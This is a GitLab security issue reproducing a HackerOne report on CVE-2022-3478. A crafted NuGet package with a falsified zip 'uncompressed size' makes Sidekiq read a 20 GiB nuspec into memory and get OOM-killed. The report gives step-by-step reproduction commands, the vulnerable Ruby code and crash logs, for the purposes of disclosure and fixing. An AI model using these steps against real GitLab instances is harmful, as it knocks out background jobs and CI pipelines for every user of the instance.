Headline
CVE-2022-3478: Sidekiq background job DoS by uploading malicious Nuget packages (#377788) · Issues · GitLab.org / GitLab · GitLab
An issue has been discovered in GitLab affecting all versions starting from 12.8 before 15.4.6, all versions starting from 15.5 before 15.5.5, all versions starting from 15.6 before 15.6.1. It was possible to trigger a DoS attack by uploading a malicious nuget package.
Skip to content
Open Issue created Oct 13, 2022 by GitLab SecurityBot@gitlab-securitybotReporter
Sidekiq background job DoS by uploading malicious Nuget packages
HackerOne report #1716296 by luryus on 2022-09-29, assigned to GitLab Team:
Report | Attachments | How To Reproduce
Report****Summary
By uploading a crafted malicious Nuget package, an attacker can cause sidekiq to use too much memory and crash (get killed by OOMKiller in Linux). In small (self-hosted) Gitlab environments, where there’s only a single Sidekiq node, this will cause some background jobs to fail and their execution will get delayed. For instance, the CI pipelines of other users may get interrupted. In other words, this can cause minor denial of service.
When an user uploads a Nuget package, Gitlab will extract its metadata in a sidekiq background job. This extraction is done by unzipping the .nuspec file from the nupkg package (they are plain old zip archives). The metadata extraction job first checks the nuspec file size in the zip file metadata, to avoid trying to read too large nuspec files. If this check succeeds, the job will continue to extract the nuspec file into memory with no further size checks or limits.
An attacker can freely alter the metadata in the zip file and change the “uncompressed size” attribute of the nuspec file. They might, for example, create a nupkg file with a 20-gigabyte nuspec file, and alter the metadata such that the “uncompressed size” is 256 bytes. When this kind of file would be uploaded to Gitlab, the extraction worker job would try to allocate a 20 gigabyte buffer for extracting the file. In most smaller environments this would lead to sidekiq getting killed.
Because the attacker only needs to upload a single, small (a few megabyte) file to achieve this, it’s difficult or impossible to mitigate this with rate limits. The attacker can even upload the same file repeatedly without triggering rate limits (e.g. every 5-10 seconds) to continuously cause crashes.
Steps to reproduce
Make sure that Nuget package repository is enabled in the Gitlab instance
Install dotnet sdk locally
Create a personal project in gitlab
Locally, setup a nuget source for pushing to the new project (replace username, access token, gitlab instance url and project id):
dotnet nuget add source -n "gitlab-nuget-test" -u <username> -p <personal_access_token> "http://<gitlab-url>/api/v4/projects/<project_id>/packages/nuget/index.json" --store-password-in-clear-text
Craft a malicious nuget package, for example with these steps (Linux commands):
# Create a big empty file. Here a 20 gig file is created, but this can be increased too if the sidekiq instance # has a lot of memory touch 20gig.nuspec fallocate -z -l 20GiB 20gig.nuspec # Zip it zip -9 20gig.nupkg 20gig.nuspec # Run the attached python script to change the "uncompressed size" attributes python3 rewrite_size.py 20gig.nupkg
Upload the crafted package to gitlab
dotnet nuget push -s gitlab-nuget-test --interactive 20gig.nupkg
Observe Sidekiq crashes due to OOMKills in Gitlab server logs.
Impact
An attacker can get a sidekiq worker OOMKilled by a simple file upload. This will interrupt any background jobs running on that particular worker. Because the attack is very simple, the attacker can do this often to continuously cause crashes.
This can affect any user in the Gitlab instance because much of Gitlab’s functionality relies on sidekiq jobs. For instance, this may cause a CI pipeline to fail and be left in a “pending” state for a long time, if a background job for that pipeline was running when sidekiq crashed.
What is the current bug behavior?
Gitlab’s Nuget extraction worker trusts the size indicated in the zip file metadata, but does not limit the actual decompressed file size.
Snippet from metadata_extraction_service.rb:
def nuspec_file_content
with_zip_file do |zip_file|
entry = zip_file.glob('*.nuspec').first
raise ExtractionError, 'nuspec file not found' unless entry
raise ExtractionError, 'nuspec file too big' if entry.size > MAX_FILE_SIZE
entry.get_input_stream.read
end
end
def with_zip_file(&block)
package_file.file.use_open_file do |open_file|
zip_file = Zip::File.new(open_file, false, true)
yield(zip_file)
end
end
With the malicious file, entry.size > MAX_FILE_SIZE return false, because according to the zip file metadata, the nuspec file is only 255 bytes long.
On the next line, no length parameter is given to the read method call. Therefore the entire uncompressed file will be read into a memory buffer. With the example steps above, this would be 20 gigabytes, but the attacker can freely control this and make the file bigger.
What is the expected correct behavior?
Gitlab should check the size in the metadata, and limit the amount of data read while unzipping to avoid allocating too much RAM.
Relevant logs and/or screenshots
Logs depend on environment. OOMKills are easiest to observe in Linux kernel logs (dmesg).
Here is an example from my own instance, after a Nuget extraction job is started, SidekiqDaemon::MemoryKiller soon notices that Sidekiq is using too much memory, and then Linux kills Sidekiq before the MemoryKiller has a chance to gracefully shut it down (to clarify, SidekiqDaemon::MemoryKiller does not have time to do anything here before Linux OOMKiller jumps in).
{"severity":"INFO","time":"2022-09-29T06:12:36.295Z","retry":3,"queue":"default","version":0,"queue_namespace":"package_repositories","args":["1392"],"class":"Packages::Nuget::ExtractionWorker","jid":"30a8332b4d36ca1cb0170554","created_at":"2022-09-29T06:12:36.290Z","correlation_id":"01GE3Y080TVGVHFZ6089RPC8HZ","meta.caller_id":"PUT /api/:version/projects/:id/packages/nuget","meta.remote_ip":"172.18.0.1","meta.feature_category":"package_registry","meta.user":"root","meta.client_id":"user/1","meta.root_caller_id":"PUT /api/:version/projects/:id/packages/nuget","worker_data_consistency":"always","idempotency_key":"resque:gitlab:duplicate:default:a7e8f751bc2b7cb679eb178e069da05671c426d4a4374a47ab6762cb738db68e","size_limiter":"validated","enqueued_at":"2022-09-29T06:12:36.291Z","job_size_bytes":6,"pid":765,"message":"Packages::Nuget::ExtractionWorker JID-30a8332b4d36ca1cb0170554: start","job_status":"start","scheduling_latency_s":0.003906}
{"severity":"WARN","time":"2022-09-29T06:12:48.992Z","class":"Gitlab::SidekiqDaemon::MemoryKiller","pid":765,"message":"Sidekiq worker RSS out of range","current_rss":2824928,"soft_limit_rss":2000000,"hard_limit_rss":274877906944,"reason":"current_rss(2824928) \u003e soft_limit_rss(2000000)","running_jobs":[{"jid":"30a8332b4d36ca1cb0170554","worker_class":"Packages::Nuget::ExtractionWorker"}],"retry":0}
{"severity":"WARN","time":"2022-09-29T06:12:52.059Z","class":"Gitlab::SidekiqDaemon::MemoryKiller","pid":765,"message":"Sidekiq worker RSS out of range","current_rss":3650632,"soft_limit_rss":2000000,"hard_limit_rss":274877906944,"reason":"current_rss(3650632) \u003e soft_limit_rss(2000000)","running_jobs":[{"jid":"30a8332b4d36ca1cb0170554","worker_class":"Packages::Nuget::ExtractionWorker"}],"retry":0}
[Thu Sep 29 09:12:52 2022] Out of memory: Killed process 6891 (bundle) total-vm:16266276kB, anon-rss:5457436kB, file-rss:4kB, shmem-rss:792kB, UID:998 pgtables:17812kB oom_score_adj:0
{"severity":"INFO","time":"2022-09-29T06:12:59.788Z","message":"A worker terminated, shutting down the cluster"}
Results of GitLab environment info
Docker installation:
System information
System:
Proxy: no
Current User: git
Using RVM: no
Ruby Version: 2.7.5p203
Gem Version: 3.1.6
Bundler Version:2.3.15
Rake Version: 13.0.6
Redis Version: 6.2.7
Sidekiq Version:6.4.2
Go Version: unknown
GitLab information
Version: 15.4.0-ee
Revision: abbda55531f
Directory: /opt/gitlab/embedded/service/gitlab-rails
DB Adapter: PostgreSQL
DB Version: 13.6
URL: http://gl.lkoskela.com:8929
HTTP Clone URL: http://gl.lkoskela.com:8929/some-group/some-project.git
SSH Clone URL: ssh://[email protected]:2224/some-group/some-project.git
Elasticsearch: no
Geo: no
Using LDAP: no
Using Omniauth: yes
Omniauth Providers:
GitLab Shell
Version: 14.10.0
Repository storage paths:
- default: /var/opt/gitlab/git-data/repositories
GitLab Shell path: /opt/gitlab/embedded/service/gitlab-shell
Impact
An attacker can get a sidekiq worker OOMKilled by a simple file upload. This will interrupt any background jobs running on that particular worker. Because the attack is very simple, the attacker can do this often to continuously cause crashes.
The severity of this depends on the sidekiq setup: with larger and more distributed instances it will of course be smaller as crashes are limited to only a subset of sidekiq instances. In small self-hosted environments though this can have a large impact on the functionality of Gitlab.
This can affect any user in the Gitlab instance because much of Gitlab’s functionality relies on sidekiq jobs. Background job execution may get delayed or in some cases they may not get executed at all (if attacker can keep Sidekiq crashing continuously). For instance, this may cause a CI pipeline to fail and be left in a “pending” state for a long time, if a background job for that pipeline was running when sidekiq crashed.
Attachments
Warning: Attachments received through HackerOne, please exercise caution!
- rewrite_size.py
How To Reproduce
Please add reproducibility information to this section: